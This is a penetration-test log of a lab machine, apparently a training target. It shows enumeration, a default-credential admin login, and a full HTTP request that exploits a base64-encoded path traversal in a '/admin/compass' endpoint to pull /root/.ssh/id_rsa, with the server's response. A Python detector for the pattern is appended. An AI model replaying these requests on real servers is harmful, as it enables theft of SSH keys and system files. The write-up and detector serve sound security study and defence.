CVE-2024-55415
Pentest Log: 2025-08-02
Target Information
- Machine Name: CVE-2024-55415
- IP Address: 192.168.172.81
- Operating System: Linux
ip=192.168.172.81
Enumeration
Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 8000
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Found the /admin/login page; logged in with the default credentials:
admin@admin.com:password
Exploitation
Vulnerability Summary
- Service / Port: 8000
- Vulnerability Type: LFI
Exploit Execution
Exploit Method
Tool / Script Used:
CVE-2024-55415
GET /admin/compass?download=Li4vLi4vLi4vLi4vLi4vLi4vLi4vcm9vdC8uc3NoL2lkX3JzYQ== HTTP/1.1
Host: 192.168.172.81:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://192.168.172.81:8000/admin/compass?log=L2V0Yy9wYXNzd2Q=
Cookie: XSRF-TOKEN=[value omitted]; laravel_session=[value omitted]
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Response received:
HTTP/1.1 200 OK
Host: 192.168.172.81:8000
Date: Wed, 20 Aug 2025 22:16:54 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.29
Cache-Control: public
Date: Wed, 20 Aug 2025 22:16:54 GMT
Last-Modified: Tue, 15 Jul 2025 12:40:58 GMT
Content-Disposition: attachment; filename=id_rsa
Content-Type: text/plain; charset=UTF-8
Content-Length: 1823
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=[value omitted]; expires=Thu, 21-Aug-2025 00:16:54 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=[value omitted]; expires=Thu, 21-Aug-2025 00:16:54 GMT; Max-Age=7200; path=/; httponly; samesite=lax
[Response body: OpenSSH private key (id_rsa), contents omitted]
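Detection logic for the request pattern above, added here as an example and not part of the original log: it decodes the base64 `download` and `log` parameters of `/admin/compass` requests found in an access log and flags any whose path resolves outside an allowed directory. `ALLOWED_ROOT`, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the directory the log viewer is meant to serve (hypothetical path).
ALLOWED_ROOT = "/var/www/app/storage/logs"
WATCHED_PARAMS = ("download", "log")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_path(value):
    """Return the base64-decoded parameter as text, or None if it is not valid base64."""
    value = value.replace(" ", "+")  # parse_qs turns a raw '+' into a space
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def escapes_root(path, root=ALLOWED_ROOT):
    """True when the path, resolved relative to root, lands outside root."""
    resolved = posixpath.normpath(posixpath.join(root, path))
    return resolved != root and not resolved.startswith(root + "/")

def suspicious_requests(log_lines):
    """Yield (line_no, param, decoded_path) for compass requests reading outside ALLOWED_ROOT."""
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.rstrip("/") != "/admin/compass":
            continue
        query = parse_qs(url.query)
        for param in WATCHED_PARAMS:
            for value in query.get(param, []):
                decoded = decode_path(value)
                if decoded is not None and escapes_root(decoded):
                    yield line_no, param, decoded

# Constructed sample access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Aug/2025:22:16:50 +0000] "GET /admin/compass?log=bGFyYXZlbC5sb2c= HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Aug/2025:22:16:52 +0000] "GET /admin/compass?log=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 1843',
    '10.0.0.5 - - [20/Aug/2025:22:16:54 +0000] "GET /admin/compass?download=Li4vLi4vLi4vLi4vLi4vLi4vLi4vcm9vdC8uc3NoL2lkX3JzYQ== HTTP/1.1" 200 1823',
]
if __name__ == "__main__":
    print(list(suspicious_requests(SAMPLE_LOG)))
```

The same `escapes_root` check, applied server-side before the file is opened, is the corresponding input validation for the download handler.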
Privilege Escalation
Current Access
- User: root
- Groups: 0(root)
- Shell Type: ssh
Enumeration
Privilege Escalation Exploit
Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A